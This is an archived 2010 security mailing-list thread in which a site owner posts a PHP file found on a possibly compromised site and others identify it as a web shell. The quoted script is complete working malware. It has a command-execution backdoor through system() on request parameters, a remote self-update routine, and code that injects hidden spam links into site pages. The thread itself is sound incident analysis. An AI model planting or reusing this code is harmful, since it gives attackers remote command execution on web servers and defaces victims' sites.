Odd PHP file, trying to find out what it does
From: bradmcmahon at gmail.com (Bradley McMahon)
Date: Mon, 1 Mar 2010 12:03:05 -0500
Here is the manual page for the `system` function: http://us.php.net/manual/en/function.system.php — it looks like it could be pretty nasty. -Brad On Mon, Mar 1, 2010 at 11:29 AM, Andrew Ellis <only.samurai at gmail.com> wrote:
This is pretty heavily obscured (obviously), but the structure and some of the things it's doing is reminiscent of PHP Shell, like C99. Code like: function Com() { ? ?if (isset($_POST['c'])) ? ? ?@system($_POST['c']); ?if (isset($_GET['c'])) ? ? ? ?@system($_GET['c']); } Is used to pass things through the web-page to the server, allowing the malicious user to control things more granularly. I copied all the code you posted to a server and ran it through php at the command line. If you add in something like $_POST['c'] = "ls > test.txt" to the top of the file and run it, you'll find no output on the page, but a nicely created test.txt file with the contents of the directory containing this script... Sad to say, looks like you were 0wned. On Mon, Mar 1, 2010 at 3:16 AM, Adrian Crenshaw <irongeek at irongeek.com> wrote:Ok, I think one of my sites may have been compromised. I found the following PHP script on a site, but I'm not sure what it is trying to do. Anyone else ever seen this script before? Adrian <?php ignore_user_abort(1); set_time_limit(0); function Clear() { ??? unlink("c"); ??? unlink("1r"); ? unlink("log"); } function Clear2() { ??? $mrd = trim(file_get_contents("m")); ??? $pt = "../$mrd"; ??? $fin = file_get_contents($pt); ??? $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); ? $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); ??? $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); ??? $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); ??? $fin = ereg_replace("<!--dd4-->", "", $fin); ? $fin = ereg_replace("<!--dd5-->", "", $fin); ? $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); ??? $fmrd = fopen($pt, "w+"); ??? fwrite($fmrd, $fin); ??? fclose($fmrd); ??? echo " upt-ok"; } function GetVar($name, &$var) { ??? $var = ""; ??? if (isset($_POST[$name])) ??? ??? $var = $_POST[$name]; ? if (isset($_GET[$name])) ??? ??? $var = $_GET[$name]; ??? 
if (($var) =="") ??? ? return? false; ??? ? else return true; } function Gen() { ??? $alp = "abcdefghiklmnjsweqrtyuiopzx"; ??? $maps = array(); ??? if (isset($_POST["sg"])) ??? ??? $sg = $_POST["sg"]; ? if (isset($_GET["sg"])) ??? ??? $sg = $_GET["sg"]; ??? if (isset($_POST["gm"])) ???? ?$g = $_POST["gm"]; ??? if (isset($_GET["gm"])) ??? ??? $g = $_GET["gm"]; ??? $path = ""; ??? $fr = fopen("1r", "a+"); ??? if (file_exists("c")) ??? { ??? ??? $fconf = file("c"); ??? ??? $tname = trim($fconf[0]); ??? ??? $cname = trim($fconf[1]); ??? ??? $curs = trim($fconf[2]); ??? ??? $pid = trim($fconf[3]); ??? ??? if ($pid == 100) ??? ??? { ??? ??? ??? $pid = 0; ??? ??? ??? $rnd = mt_rand(0, 999); ??? ??? ??? $nm = ""; ??? ??? for ($i=0; $i<3; $i++) ??? ? ??? { ??? ??? ? ??? $ran = mt_rand(0,26); ??? ??? ? ??? $sym = $alp[$ran]; ??? ??? ? ??? $nm = $nm.$sym; ??? ??? ? } ??? ??? ??? $cname = $nm; ??? ??? ??? mkdir("$tname/$cname"); ??? ??? ??? $curs = $g; ??? ??? } ??? } ??? else ??? { ??? ??? $rnd = mt_rand(0, 999); ??? ??? $nm = ""; ??? ? for ($i=0; $i<5; $i++) ??? ??? { ??? ??? ??? $ran = mt_rand(0,26); ??? ??? ??? $sym = $alp[$ran]; ??? ??? ??? $nm = $nm.$sym; ??? ??? } ??? ??? $tname = $nm; ??? ??? $pid = 0; ??? ??? $curs = $g; ??? ??? mkdir($tname); ??? ??? $fht = fopen("$tname/.htaccess", "w+"); ??? ??? $htname = $sg."2.txt"; ??? ??? $fp = fopen($htname, "r"); ??? ??? $fin = ''; ??? ??? while (!feof($fp)) ??? ??? { ??? ??? ??? ?$fc = fgets($fp, 1024); ??? ??? ??? ?if (!$fc) break; ??? ??? ?? $fin .= $fc; ??? ??? } ??? ??? fclose($fp); ??? ??? fwrite($fht, $fin); ??? ??? fclose($fht); ??? ??? $rnd = mt_rand(0, 999); ??? ??? $nm = ""; ??? for ($i=0; $i<3; $i++) ? ??? { ??? ? ??? $ran = mt_rand(0,26); ??? ? ??? $sym = $alp[$ran]; ??? ? ??? $nm = $nm.$sym; ??? ? } ??? ??? $cname = $nm; ??? mkdir("$tname/$cname"); ??? } ? $gname = $sg."sgen.php"; ??? for ($j=$pid; $j<$pid+10; $j++) ??? { ??? ??? $fp = fopen($gname."?g=$curs", "r"); ??? ??? $fin = ''; ??? ??? 
while (!feof($fp)) ??? ??? { ??? ??? ??? ?$fc = fgets($fp, 1024); ??? ??? ??? ?if (!$fc) break; ??? ??? ?? $fin .= $fc; ??? ??? } ??? ??? fclose($fp); ??? ??? $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); ??? ??? fwrite($fnd, $fin); ??? ??? fclose($fnd); ??? } ??? if ($j==100) ??? { ??? ? $fp = fopen($gname."?g=$curs&m=1", "r"); ??? ??? $fin = ''; ??? ??? while (!feof($fp)) ??? ??? { ??? ??? ??? ?$fc = fgets($fp, 1024); ??? ??? ??? ?if (!$fc) break; ??? ??? ?? $fin .= $fc; ??? ??? } ??? ??? fclose($fp); ??? ??? $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); ??? ??? fwrite($fnd, $fin); ??? ??? fclose($fnd); ??? ??? $map = "$path/$tname/$cname/$curs"."_lm.htm"; ??? ??? fwrite($fr,"$map\n"); ??? } ??? $fconf = fopen("c", "w+"); ??? fwrite($fconf, $tname."\n"); ??? fwrite($fconf, $cname."\n"); ??? fwrite($fconf, $curs."\n"); ??? $nj = $j; ??? fwrite($fconf, $nj."\n"); ??? fclose($fconf); } function Update() { ??? $thisname = "1.php"; ??? if (isset($_POST['u'])) ??? ? $u = $_POST['u']; ??? if (isset($_GET['u'])) ???? ??? $u = $_GET['u']; ???? $fp = fopen($u, "r"); ? $fin = ''; ??? ??? while (!feof($fp)) ??? ??? { ??? ??? ??? ?$fc = fgets($fp, 1024); ??? ??? ??? ?if (!$fc) break; ??? ??? ?? $fin .= $fc; ??? ??? } ? fclose($fp); ? $fthis = fopen($thisname, "w+"); ? fwrite($fthis, $fin); ? fclose($fthis); } function Com() { ??? if (isset($_POST['c'])) ??? ? @system($_POST['c']); ? if (isset($_GET['c'])) ??? ??? @system($_GET['c']); } function UpKos() { ??? $mrd = trim(file_get_contents("m")); ??? $pt = "../$mrd"; ??? $fin = file_get_contents($pt); ??? $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); ??? $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); ??? $fmrd = fopen($pt, "w+"); ??? fwrite($fmrd, $fin); ??? fclose($fmrd); } function MRepl() { ??? $mpt = ""; ??? $drs = ""; ??? $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; ? $endtag = "</font></body></html><sdioyslkjs2> "; ??? 
$mrd = trim(file_get_contents("m")); ??? $pt = "../$mrd"; ??? $fin = file_get_contents($pt); ??? GetVar("mpt", $mpt); ??? ?// ??????? ??????????? ???? ???? ? $fin = preg_replace ("/<\/body>/i", "", $fin); ? $fin = preg_replace ("/<\/html>/i", "", $fin); ? $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); ? $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); ??? $fp = fopen($mpt, "r"); ? GetVar("drs", $drs); ? $fin = $fin.$begtag; $drs = str_replace("\\", "", $drs); ? $fin = $fin.$drs; ? $fin = $fin.$endtag; ? $fmrd = fopen($pt, "w+"); ??? fwrite($fmrd, $fin); ??? fclose($fmrd); } function Main() { ??? if (isset($_POST['u']) || isset($_GET['u'])) ??? { ??? ??? Update(); ??? ??? exit(); ??? } ??? if (isset($_POST['c']) || isset($_GET['c'])) ??? { ??? ??? Com(); ??? ??? exit(); ??? } ??? ??? if (isset($_POST['uk']) || isset($_GET['uk'])) ??? { ??? ??? UpKos(); ??? ??? exit(); ??? } ??? if (isset($_POST['g']) || isset($_GET['g'])) ??? { ??? ??? Gen(); ??? ??? exit(); ??? } ??? if (isset($_POST['s']) || isset($_GET['s'])) ??? { ??? ??? MRepl(); ??? ??? exit(); ??? } ? if (isset($_POST['cl']) || isset($_GET['cl'])) ??? { ??? ??? Clear(); ??? ??? exit(); ??? } ??? if (isset($_POST['cl2']) || isset($_GET['cl2'])) ??? { ??? ??? Clear2(); ??? ??? exit(); ??? } ??? echo "<ok>"; } Main(); ?> _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com-- Andrew Ellis http://blog.psych0tik.net _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com